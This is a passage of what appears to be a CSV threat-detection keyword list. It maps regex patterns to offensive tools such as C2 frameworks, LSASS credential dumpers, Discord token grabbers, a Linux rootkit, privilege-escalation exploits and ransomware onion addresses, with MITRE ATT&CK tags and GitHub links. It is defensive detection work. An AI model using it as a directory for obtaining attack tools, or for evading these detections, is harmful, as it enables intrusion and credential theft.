TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","51469" "*luckbit53sdne5yd5vdekadhwnbzjyqlbjkc4g33hs6faphfkvivaeid.onion*",".{0,1000}luckbit53sdne5yd5vdekadhwnbzjyqlbjkc4g33hs6faphfkvivaeid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51470" "*luckystrike.ps1*",".{0,1000}luckystrike\.ps1.{0,1000}","offensive_tool_keyword","luckystrike","A PowerShell based utility for the creation of malicious Office macro documents.","T1566 - T1059 - T1027","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/curi0usJack/luckystrike","1","1","N/A","N/A","10","10","1108","241","2017-11-03T17:52:13Z","2016-09-22T18:57:50Z","51471" "*Luct0r/KerberOPSEC*",".{0,1000}Luct0r\/KerberOPSEC.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in 
C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","51472" "*LUgsLS1IT1NU*",".{0,1000}LUgsLS1IT1NU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51473" "*luijait/PwnKit*",".{0,1000}luijait\/PwnKit.{0,1000}","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tool","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","N/A","1","96","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z","51474" "*luks2john.py*",".{0,1000}luks2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced 
offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","51475" "*Luna Grabber | Created By Smug*",".{0,1000}Luna\sGrabber\s\|\sCreated\sBy\sSmug.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","51476" "*Luna Grabber Builder - Running on v*",".{0,1000}Luna\sGrabber\sBuilder\s\-\sRunning\son\sv.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","51477" "*lures create *",".{0,1000}lures\screate\s.{0,1000}","offensive_tool_keyword","gophish","Combination of evilginx2 and GoPhish","T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113","TA0002 - TA0003","N/A","Black Basta","Phishing","https://github.com/fin3ss3g0d/evilgophish","1","0","N/A","N/A","10","10","1762","340","2024-06-15T17:48:11Z","2022-09-07T02:47:43Z","51478" "*LVAsLS1QT1JU*",".{0,1000}LVAsLS1QT1JU.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51479" "*LW8sLS1vcHRpb25z*",".{0,1000}LW8sLS1vcHRpb25z.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51480" "*LWIsLS1idWNrZXQ=*",".{0,1000}LWIsLS1idWNrZXQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51481" "*LWYsLS1maWxl*",".{0,1000}LWYsLS1maWxl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51482" "*LXAsLS1waWQ=*",".{0,1000}LXAsLS1waWQ\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51483" "*LXAsLS1wYXlsb2Fk*",".{0,1000}LXAsLS1wYXlsb2Fk.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51484" "*LXUsLS11cmk=*",".{0,1000}LXUsLS11cmk\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","51485" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002 - T1649","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","N/A","8","710","70","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z","51486" "*ly4k/Certipy*",".{0,1000}ly4k\/Certipy.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","1","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","51487" "*ly4k/PassTheChallenge*",".{0,1000}ly4k\/PassTheChallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","1","N/A","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","51488" "*ly4k/SpoolFool*",".{0,1000}ly4k\/SpoolFool.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","1","N/A","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","51489" "*lyncsmash*",".{0,1000}lyncsmash.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations","T1580 - T1201 - T1071 - T1110 - T1078","TA0043 - TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51490" 
"*lyncsmash.git*",".{0,1000}lyncsmash\.git.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51491" "*lyncsmash.log*",".{0,1000}lyncsmash\.log.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","#logfile","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51492" "*lyncsmash.py*",".{0,1000}lyncsmash\.py.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51493" "*lyncsmash-master*",".{0,1000}lyncsmash\-master.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","51494" "*LyncSniper*",".{0,1000}LyncSniper.{0,1000}","offensive_tool_keyword","LyncSniper","LyncSniper is a tool for penetration testing Lync and Skype for Business deployments hosted either on premise or in Office 365","T1566 - T1574 - T1210 - T1596","TA0002 - TA0011 - TA0009","N/A","N/A","Exploitation 
tool","https://github.com/mdsecactivebreach/LyncSniper","1","0","N/A","N/A","7","1","9","3","2017-04-11T08:38:28Z","2017-06-12T10:56:58Z","51495" "*lynxmk/blackvision*",".{0,1000}lynxmk\/blackvision.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","1","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","51496" "*lypd0/DeadPotato*",".{0,1000}lypd0\/DeadPotato.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","51497" "*-m * -d * -w * --top-web-ports*",".{0,1000}\-m\s.{0,1000}\s\-d\s.{0,1000}\s\-w\s.{0,1000}\s\-\-top\-web\-ports.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","51498" "*-m dumpert *",".{0,1000}\-m\sdumpert\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","51499" "*-M handlekatz -o *",".{0,1000}\-M\shandlekatz\s\-o\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","51500" "*'M', 'E', 'L', 'T', 'E', 'D', 0*",".{0,1000}\'M\',\s\'E\',\s\'L\',\s\'T\',\s\'E\',\s\'D\',\s0.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51501" "*'M', 'i', 'n', 'i', 'D', 'u', 'm', 'p', 'W', 'r', 'i', 't', 'e', 'D', 'u', 'm', 'p'*",".{0,1000}\'M\',\s\'i\',\s\'n\',\s\'i\',\s\'D\',\s\'u\',\s\'m\',\s\'p\',\s\'W\',\s\'r\',\s\'i\',\s\'t\',\s\'e\',\s\'D\',\s\'u\',\s\'m\',\s\'p\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51502" "*'M','i','n','i','D','u','m','p','W','r','i','t','e','D','u','m','p'*",".{0,1000}\'M\',\'i\',\'n\',\'i\',\'D\',\'u\',\'m\',\'p\',\'W\',\'r\',\'i\',\'t\',\'e\',\'D\',\'u\',\'m\',\'p\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","51503" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - 
T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51504" "*M.i.m.i.k.a.t.z*",".{0,1000}M\.i\.m\.i\.k\.a\.t\.z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51505" "*m00zh33/golang_c2*",".{0,1000}m00zh33\/golang_c2.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","51506" "*m0nad/Diamorphine*",".{0,1000}m0nad\/Diamorphine.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","1","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","51507" "*m0rv4i/SharpCookieMonster*",".{0,1000}m0rv4i\/SharpCookieMonster.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","51508" "*m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion*",".{0,1000}m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51509" "*m3f157O/combine_harvester*",".{0,1000}m3f157O\/combine_harvester.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","51511" "*m4ll0k/SecretFinder*",".{0,1000}m4ll0k\/SecretFinder.{0,1000}","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","N/A","10","2153","405","2024-05-26T09:36:41Z","2020-06-08T10:50:12Z","51512" "*m6s6axasulxjkhzh.onion*",".{0,1000}m6s6axasulxjkhzh\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51513" 
"*m8sec/nullinux*",".{0,1000}m8sec\/nullinux.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","1","#linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","51514" "*MAAD_Attack.ps1*",".{0,1000}MAAD_Attack\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51515" "*MAAD_Config.ps1*",".{0,1000}MAAD_Config\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51516" "*MAAD_Mitre_Map.ps1*",".{0,1000}MAAD_Mitre_Map\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","51517" "*MAADInitialization.ps1*",".{0,1000}MAADInitialization\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation 